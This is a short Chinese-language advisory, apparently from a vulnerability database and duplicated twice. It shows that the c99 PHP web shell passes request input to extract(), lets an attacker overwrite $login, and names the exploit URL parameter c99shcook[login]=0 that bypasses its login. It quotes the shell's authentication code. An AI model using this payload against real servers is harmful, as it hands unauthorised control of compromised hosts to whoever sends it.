VULHUB ™

<p>@extract($_REQUEST["c99shcook"]);这行代码导致变量覆盖</p><p>可以使得$login=0，直接登陆</p><p><br></p><pre class="">if ($login) { if (empty($md5_pass)) { $md5_pass = md5($pass); } if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { if ($login_txt === false) { $login_txt = ""; } elseif (empty($login_txt)) { $login_txt = strip_tags(ereg_replace("&amp;amp;nbsp;|&amp;lt;br&amp;gt;", " ", $donated_html)); } header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\""); header("HTTP/1.0 401 Unauthorized"); exit($accessdeniedmess); } } </pre><p><br></p><p>漏洞利用过程</p><p>访问<a href="http://xx.com/xx.php">http://xx.com/xx.php</a>?c99shcook[login]=0<br></p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434684208314-1.png" data-image-size="865,311"><br></p>

<p>@extract($_REQUEST["c99shcook"]);这行代码导致变量覆盖</p><p>可以使得$login=0，直接登陆</p><p><br></p><pre class="">if ($login) { if (empty($md5_pass)) { $md5_pass = md5($pass); } if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { if ($login_txt === false) { $login_txt = ""; } elseif (empty($login_txt)) { $login_txt = strip_tags(ereg_replace("&amp;amp;nbsp;|&amp;lt;br&amp;gt;", " ", $donated_html)); } header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\""); header("HTTP/1.0 401 Unauthorized"); exit($accessdeniedmess); } } </pre><p><br></p><p>漏洞利用过程</p><p>访问<a href="http://xx.com/xx.php">http://xx.com/xx.php</a>?c99shcook[login]=0<br></p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434684208314-1.png" data-image-size="865,311"><br></p>